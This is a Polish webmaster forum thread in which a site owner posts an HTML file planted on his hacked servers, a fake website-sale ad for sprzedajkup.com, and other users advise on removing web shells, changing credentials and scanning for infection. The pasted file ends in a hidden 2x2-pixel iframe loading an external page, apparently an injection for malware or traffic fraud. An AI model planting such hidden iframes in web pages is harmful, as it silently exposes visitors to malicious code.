Włamania na serwer i domena http://sprzedajkup.com/

[kwalejko 13]

Mam jakiegoś gościa, który włamuje się mi na serwery. Dodaje pliki takie:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<title>Witaj serdecznie na aukcji</title>
</head>

<CENTER><body

<p align="center"><font face="Verdana"><font color="#000000" size="5"><u><b>Szukasz interesu który bez ¿adnej Twojej pomocy bedzie zarabia³ dla Ciebie?</b>
<b><p>
<br>
<p align="center"><font face="Verdana"><font color="#000000" size="5"><u><b>Mamy coœ takiego dla Ciebie!</b>
<b><p>
<br>
<p align="center"><font face="Verdana"><font color="#000000" size="5"><u><b>Przedmiotem Sprzeda¿y jest Serwis:</b></u></font><br>
<b>
<center><td width="7%"><img width="450" height="152" border="0" src="http://sprzedajkup.com/themes/3D-Fantasy/images/gora1.jpg" /></td>
<br>
<a href="http://www.sprzedajkup.com"><font size="5">www.SprzedajKup.com</font></a><br></center>
 </b></font></p>
<br><center><span style="background-color: #FFFF00"><font size="4">Pare s³ów o Serwisie</font></span></center>
<br><center><font size="+1">Stronê otworzy³em w ubieg³ym roku w pozycjonowa³em j¹ dodawa³em do katalogów, teraz wystarczy czekaæ i patrzeæ na rosn¹ce statystyki odwiedzin.Portal aktualnie ma bardzo du¿¹ baze og³oszeñ,codziennie przybywa paredziesi¹t nowych,ciagle wyniki w wyszukiwarkach podnosz¹ siê dzieki temu wzrasta iloœc odwiedzin,ca³y czas nap³ywaj¹ propozycje wspó³pracy ,wymiany linków,poprostu strona ¿yje!</font><br>
<center><td width="7%"><img width="1250" height="1252" border="0" src="http://gitez.pl/sprzedajglowna.JPG" /></td>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">


<br><center><span style="background-color: #FFFF00"><font size="4">Czemu wybra³em akurat og³oszenia?</font></span></center>
<br><center><font size="+1">Ostatnio na rynku stron z og³oszeniami panuje wielki boom, z tego powodu i¿ otfar³y siê nowe miejsca pracy dla Polaków, wiec my sami szukamy dobrze p³atnej pracy, a multum pracodawców z zagranicy i posrednikow daje og³oszenia.Drugi istotnym elementem w portalu z og³oszeniami jest to i¿ nie musimy aktualizawac strony dodawaæ nowych artyku³ów, a mo¿emy zarabiac jak inne strony w których w³aœciciele w³o¿yli wiele pracy!</font><br>

<br><center><span style="background-color: #FFFF00"><font size="4">Strona techniczna:</font></span></center>
<br><center><font size="+1">Strona oparta o technologie PHP i Mysqul,do jej dzia³anaia potrzebny jest serwer min 70 mb i transfer 5 G w zupe³nosci wystarczy.Ob³uga strony odbywa siê poprzez Panel,tam w³aœnie edytujemy og³oszenia,mo¿emy zmieniaæ bloki menu, dodawac nowe dzia³y.Rozwiniêty formularz pozwala na dok³adny opis og³oszenia.</font><br>

<br><center><span style="background-color: #FFFF00"><font size="4">Statystyki:</font></span></center></br>
<b><center>Serwis posiada oko³o 500 unikalnych odiwedzin dziennie jak widaæ w za³¹czonym linku z dok³adnymi statystykami.Stronê odk¹d zaistnia³a w sieci odwiedzi³o ponad 20000 osób.
<center><font size="+1"><br>Link do statystyk:<a href="http://sprzedajkup.com/modules.php?name=Statistics&op=Stats"><font size="5">Kliknij</font></a><br></center> </font>

<br><br><center><span style="background-color: #FFFF00"><font size="4">Domena</font></span></center><br>
<BR><center><font size="+1">Jest to ostatnia tak niezwyk³a domena, która ma bardzo dobre w³aœciwoœci pod pozycjonowanie gdy¿ zawiera ona wa¿ne s³owa kluczowe<b> Sprzedaj</> i <b>Kup</b>
Nigdy nie mia³em czasu na dok³adne pozycjonowanie strony,ale dziêki temu ¿e zawiera te w³aœnie s³owa Google ustawia j¹ na wysokich pozycjach i z t¹d tyle wejœæ!Pomyœl tylko jak¹ strona mog³a by miec ogladalnoœæ dzieki tej domenie i Ma³ego Twojego wk³adu w rozwój!</font><br>



<br>
<tr>
<td>
<p>
<td width="100%" bgcolor="#FFFFCC" bordercolor="#000000">
<p align="center"><font face="Verdana"><b>
<span style="background-color: #FFFF00"><font size="4">Co otrzymasz licytuj¹c w
aukcji:<br>
</font></span><br>
</b>1. <b>Domenê SprzedajKup.com   </b><br>
Domena wykupiona w HOME.PL na jeszcze 6 miesiecy<br>
<br>
</b>2. <b>Serwer  </b><br> Na 2 tygodnie o parametrach:
10 G transferu,
1000MB miejsca
</b><br>
<br>
</b>3. <b>Autorsk¹ grafikê.  </b><br>
Grafika wykonana przez profesionalnego gfrafika, przejrzysta i czytelna.<br>
<b/>4. <b>Wszystkie dane i has³a  </b><br>
dostêpowe wymagane do zarz¹dzania
stron¹/domen¹/serwerem itp.<br>
<br>
</b>5. <b>Moj¹ pomoc.  </b><br>
Pomoge Ci sie zapoznaæ z portalem i jego obs³ug¹,bedziesz móg³ pytaæ przez 2 tygodnie o co bedziesz chcieæ!.<br>
</b>6. <b>Kopie serwisu  </b><br>Na p³ycie, któr¹ wysy³am poczt¹ , na podany przez Ciebie adres.
</font></span></b>
</font></td></tr>
</table>
<br><center><span style="background-color: #FFFF00"><font size="4">Dlaczego sprzedaje?</font></span></center>
<br><center><font size="+1">Wyje¿dzam do pracy w Angli,nie bêde mia³ tam dostepu do internetu ,a co za tym idzie nie bede mia³ czasu dogladaæ www</font>

<br><br><center><span style="background-color: #FFFF00"><font size="4">Po zakoñczeniu aukcji:</font></span></center>
<center><font size="+1">Po zakoñczeniu aukcj,wysy³am na Twój adres e-mail numer konta bankowego, na które wp³acasz pieni¹¿ki,po zaksiegowaniu wp³aty dotajesz has³a do serwera, dokonujemy przerejestrowania domeny na Ciebie ,i t³umacze Ci jak ob³ugiowaæ ca³y portal.</font><br>


<br><br><center><span style="background-color: #F92610"><font size="5">Naprawde Warto!Zacznij Zarabiaæ!!</font></span></center>

<br><br><center><span style="background-color: #FFFF00"><font size="4">Kontakt:</font></span></center>
<center><font size="+1">Mail: admin@sprzedajkup.com lub tel:510439376 </font><br>


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?i=918960></iframe></body></html>

Mam pytanie. Jak gościa dorrwać, bo raczej jest to Polak. Zbyt dużo szkód dla mnie narobił.

[thomaso 722]

Ja bym szukał danych we whois domeny sprzedajkup.com:

 

http://whois.domaintools.com/sprzedajkup.com

 

i potem próbował wobec tej osoby (jakiś Niemiec widnieje w danych, nie Polak) wyciągnąć jakieś konsekwencje prawne albo uzyskać jakieś namiary na osobę, która się włamuje.

[kwalejko 13]

Ja bym szukał danych we whois domeny sprzedajkup.com:

 

http://whois.domaintools.com/sprzedajkup.com

 

i potem próbował wobec tej osoby (jakiś Niemiec widnieje w danych, nie Polak) wyciągnąć jakieś konsekwencje prawne albo uzyskać jakieś namiary na osobę, która się włamuje.

Tak, widziałem że to jakby jakiś Niemiec, ale po Polsku dobrze pisze. Tyle mi na jeden serwer śmieci nawrzucał, że zastanawiam się czy nie zlikwidować z 10 stron całkiem i nie budować od nowa.

[kwalejko 13]

Możliwe, ze ten gość włamał się dla tamtego na serwer też. fakt, jest to Polak, bo o polsku opisuje swoją ofertę.

[doggystyle4 213]

Próbowałeś pisać na info@perfectdomains.eu?

 

na tych stronkach domena występuje...

websellers.de

perfectdomains.eu

 

 

"fakt, jest to Polak, bo o polsku opisuje swoją ofertę."

Może gościu korzysta z translatora...

[thomaso 722]

Jak ktoś się włamał to znaczy, że gdzieś jest zostawiona jakaś luka. Najprawdopodobniej ktoś wgrał na Twój serwer tzw. shell, coś jak tu http://www.stopthehacker.com/wp-content/uploads/2012/02/c100.png - z takiego pliku c100.php wywołanego z przeglądarki w ogóle bez logowania się na ftp można dowolnie zmieniać czy kasować pliki z serwera. Powinieneś poszukać czy nie ma czegoś takiego u Ciebie dogranego na serwerze, skasować, zmienić dane do ftp i będzie ok, bo nikt nie będzie miał już nieupoważnionego dostępu. Potem możesz przywrócić serwisy z jakiejś kopii (o ile posiadasz), nie ma potrzeby ich kasowania, bo ktoś się włamuje tylko trzeba porządnie zabezpieczyć. To tak jakbyś chciał zlikwidować sklep, bo w okolicy grasują złodzieje - trzeba po prostu założyć porządną kratę czy roletę i alarm. ;-)

Edited June 2, 2013 by thomaso

[kwalejko 13]

Hm, będe musiał z jakimś programistą porozmawiać. Bo to nie dla mnie.

[Cockney 94]

Logujesz się na serwer przez ftp, wyszukujesz plik o jakim pisze Thomaso, wsiskasz del. Potem zmiana hasła ftp: logujesz się do konta przez stronę usługodawcy, zmieniasz lub dodajesz nowe konto ftp i kasujesz stare. Done

[Mr.Tea 46]

A nie masz blokady dostępu do ftp ?

Ustaw sobie tylko PL, albo dane IP

[thomaso 722]

A nie masz blokady dostępu do ftp ?

Ustaw sobie tylko PL, albo dane IP

 

Jeżeli jest taki plik php z shell-em załadowany przez osobę włamującą się gdzieś na serwerze to żadna blokada dostępu do ftp na kraj czy zmiana danych ftp nic nie da. Trik włamania się na serwer przez plik shell-a polega na tym, że dostęp do ftp w ogóle nie jest do tego potrzebny. Dlatego tak ważne (najważniejsze) jest teraz zlokalizowanie i skasowanie tego pliku przed podjęciem dalszych kroków. Trzeba przejrzeć *każdy katalog* na serwerze pod kątem bardzo podejrzanego dużego pliku od 50-200 kb, który jest gdzieś, gdzie nie powinny znajdować się pliki php (np. w katalogu ze zdjęciami) - on wcale nie musi się nazywać c100.php, a może nawet config.php czy index.php, zależnie od tego jak osoba włamująca była sprytna.

 

Przywrócenie plików i zmiana samego hasła do ftp bez skasowania tego pliku shell-a, który jest pewnie gdzieś na serwerze kompletnie nic nie da - będzie ponowne włamanie, a pliki serwisu będą ponownie podmienione.

Edited June 2, 2013 by thomaso

[Mr.Tea 46]

Oczywiście chodziło mi o późniejsze działania, już po czyszczeniu.

[limo 62]

1.nie uzywasz czasem Total Commandera jako klienta ftp?

jesli tak to odradzam przechowywanie loginu/hasla w tym programie

 

rada1:zmien haslo do konta z dostepem do FTP i nie zapisuj go w zadnym tego typu programie.

rada2:jesli nie uzywasz dostepu SSH to zmien haslo dla Twojego loginu + jesli mozesz wylaczyc dostep via SSH (bo nie korzystasz) to usun taki dostep. pamietaj by nie zapisywac hasel w zadnym programie (nawet w Putty)

 

po wykonaniu tych 2 krokow pora pousuwac to co masz zainfekowane na serwerze... najpierw zrob diagnostyke

http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/

2.co Ci pokazuje sie jak uzyjesz diagnostyki Google:

http://www.google.com/safebrowsing/diagnostic?site=www.TWOJADOMENA.pl

 

3.jesli pkt 1 nie wchodzi w gre to czy masz skrypty JAVA na serwerze?

w kodzie widac uzyta ramke wiec moze ktos dobral Ci sie do strony przez iframe injection

 

4.sprawdz nadane prawa dostepu do katalogow na serwerze szczegolnie katalog /cgi-bin/

 

5.jesli uzywasz CMSy to sciagnij patch albo ostatnia wersje oprogramowania

Jesli korzystasz z Wordpress to moze te linki Ci sie przydadza:

 

6.widac u Ciebie w kodzie IFRAME

 

 

 

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?i=918960></iframe></body></html

 

 

http://www.securitytube.net/video/5597

filmik: http://www.youtube.com/watch?feature=player_embedded&v=kFr7u9sl0xY#at=103

po cichu mozna via IFRAMES mozna wykonywac kod skryptu

 

edit:

http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

Dodatkowo do sprawdzenia:

http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

Edited June 2, 2013 by limo

[Anita 26]

A mnie zaciekawił inny fakt który wyszedł na moim lapku ....

 

 

Chciałam prze kleić ten kod html i zobaczyć tę niby ofertę w przeglądarce jednak każdorazowo gdy edytuję plik i daję zapisz Awast przenosi plik z kodem z pierwszego postu do kwarantanny

 

Kiedy edytuję na inny kod niż z pierwszego postu nic nie wykrywa i jest ok

[limo 62]

A mnie zaciekawił inny fakt który wyszedł na moim lapku ....

 

 

Chciałam prze kleić ten kod html i zobaczyć tę niby ofertę w przeglądarce jednak każdorazowo gdy edytuję plik i daję zapisz Awast przenosi plik z kodem z pierwszego postu do kwarantanny

 

Kiedy edytuję na inny kod niż z pierwszego postu nic nie wykrywa i jest ok

 

w kodzie z tego postu jest ukryta ramka iFrame i Twoj antywirus to wykrywa i wrzuca go w kwarantanne, zeby przez IFRAME nie mozna bylo zdalnie wykonac kodu ze strony, ktora jest podana w ramce 2px x 2px --> http://schiedsrichterge.bplaced.net/acwf.html?i=918960

 

 

edit: usun ten link z IFRAME i sprobuj jeszcze raz zapisac u siebie plik .html --> antywir powinien Ci wowoczas pozwolic juz to zrobic

Edited June 2, 2013 by limo

[Anita 26]

tak po usunięciu ramki zapisało

 

THX

 

Mogłam się tego domyślić

 

Pozdrawiam Anita

[limo 62]

Mam jakiegoś gościa, który włamuje się mi na serwery. Dodaje pliki takie:

...

Mam pytanie. Jak gościa dorrwać, bo raczej jest to Polak. Zbyt dużo szkód dla mnie narobił.

 

Warto rozwazyc taki wariant.

 

Jako wlasciciel strony kupuje 100.000 wejsc na allegro na jakas domene --> tak jest w przypadku wlasciciela domeny, ktora sie pojawia w kodzie powyzej: sprzedajkup.com --> kupil ruch, zeby sprzedac biznes z powodu "wyjazdu"

 

Firma sprzedajaca (posrednik) ruch posluguje sie roznymi metodami i zrodlami (warto zaznaczyc, ze osoba kupujaca ruch jest nieswiadoma tego ze ktos w ten a nie inny sposob nabija ruch dla niego + posrednik rowniez nie zawsze wie skad nabywa hurtowo ruch)..

 

Jedna z metod nabicia wejsc na strone jest jest wrzucanie do ukrytych ramek odnosnikow do stron reklamowych np poprzez zainfekowanie stron specjalnym kodem z IFRAME.

Kazda osoba odwiedzajaca strone, ktora ma ukryta ramke nie jest swiadoma iz w danej chwili nabija statysytke dla danej strony. Dla osoby odwiedzajacej strone (np: ogladajacej film online) nic nie jest widoczne przy czym w plywajacej ramce moga sie odswiezac nowe linki stron za ktore ktos zaplacil.

 

Oczywiscie firmy sprzedajace ruch korzystaja z roznych posrednikow, czesto ich nie znaja tylko kupuja hurtowo ruch.

Namierzenie takiej osoby (zrodla) jest mozliwe, ale czasochlonne + na kazdym kroku zaczynaja sie schody (osoba sprzedajaca ruch nie wyda swojego zrodla, ktorego i tak nie zna bo kupuje ruch z innych zrodel itd itp).

 

Zatem to ze jakas strona wyswietla sie po Polsku to tylko moze byc przykrywka tego zeby zla osobe szukac.

Kod w IFRAME kieruje na hosting zewnetrzny (czesto darmowy, zalozony na lewe dane). Na takim koncie pliki na okres braku ataku (automatyczne nadpisywanie plikow zdalnym "robotem" skryptem) sa czyste. Jednak gdy osoba posiadajaca siec stron zainfekowanych chce zrobic update na tych stronach to w ciagu kilku minut nadpisuje kod i czysci slady...

 

btw: dlatego latwo mozna nabijac statystyki odwiedzin domen na gieldach korzystajac z posrednictwa innych domen

 

ps. jesli ktos na ochotnika ma jakas aukcje na AM to prosze o link nabijemy troche wejsc (jednorazowo) z byle jakiej domeny, ktora posiadam zeby rozwiac watpliwosci, ze tak to sie wlasnie moze odbywac --> w zrodlach ruchu bedzie pokazana wlasnie ta domena ktora ja posiadam, a nie z ktorej jest ruch

Edited June 2, 2013 by limo

[limo 62]

 

Mam pytanie. Jak gościa dorrwać, bo raczej jest to Polak. Zbyt dużo szkód dla mnie narobił.

 

Podsumowujac powyzsze twierdzenie...

To nie ten Polak ktorego szukasz jest odpowiedzialny za kod dodany na Twoich stronach

Ale reklame serwisu, ktory on sprzedaje zrobiles mu tym postem bardzo ladna - uwazalbym wiec na przyszlosc w szybkim osadzie sprawcy, gdyz sprawa moze obrocic sie przeciwko Tobie (np: sprzedajesz jakis serwis i podpadles koledze, ktory wie ze nabiciem ruchu moze zaszkodzic reputacji Twojej firmy. ktos odkrywa, ze wlasnie link do Twojej strony nadpisuje mu jego pliki na serwerze i donosi do Ciebie do wszystkich zrodlem mozliwych). Pozostawiam bez komentarza kto zawinil...

 

Aaa...

Warto sie zabezpieczyc przed tego typu numerami na tyle ile jestemy w stanie to zrobic zarowno po stronie serwera (dobry hosting, odpowiedni htaccess, wylaczenie listingu, zarzadzanie uzytkownikami ftp/ssh, sprawdzone skrypty + patche) jak i naszej samej (zarzadzanie i przechowywanie hasel, antywirus - przyklad masz Anity, gdzie program wykryl podejrzane zrodlo).

 

edit:

na ciekawy slad mozna trafic w sieci poszukujac powiazan z czescia odnosnika: acwf.html?i=

 

trafic mozemy tu: http://urlquery.net/report.php?id=2804520

nastepnie ze zrodel raportu powiazany link prowadzi do: http://urlquery.net/report.php?id=2792917

 

Wydaje sie, ze za wszystko jest odpowiedzialny malware.

warto poczytac o przypadku: Andreya Anatolevich Alexandrova pt "Phoenix Exploit Kit"

http://krebsonsecurity.com/2013/04/phoenix-exploit-kit-author-arrested-in-russia/

http://research.zscaler.com/2013/06/red-kit-exploit-used-to-carry-out.html

http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html

 

przyznam, ze ciekawe zagadnienie zwlaszcza ze statystyka pokazuje jak duzo IFRAME injecton jest w sieci:

http://urlquery.net/statistics.php

Edited June 2, 2013 by limo

[kwalejko 13]

Niebawem będę wszystkie strony przenosił na inny serwer i każdą pokolei sprawdzał. Bo w tej chwili zainfekowanych jest może z 20 stron, ponadto pozmieniane są pliki index na bez żadnej treści.

[Mr.Tea 46]

Daj znać adminowi hosta.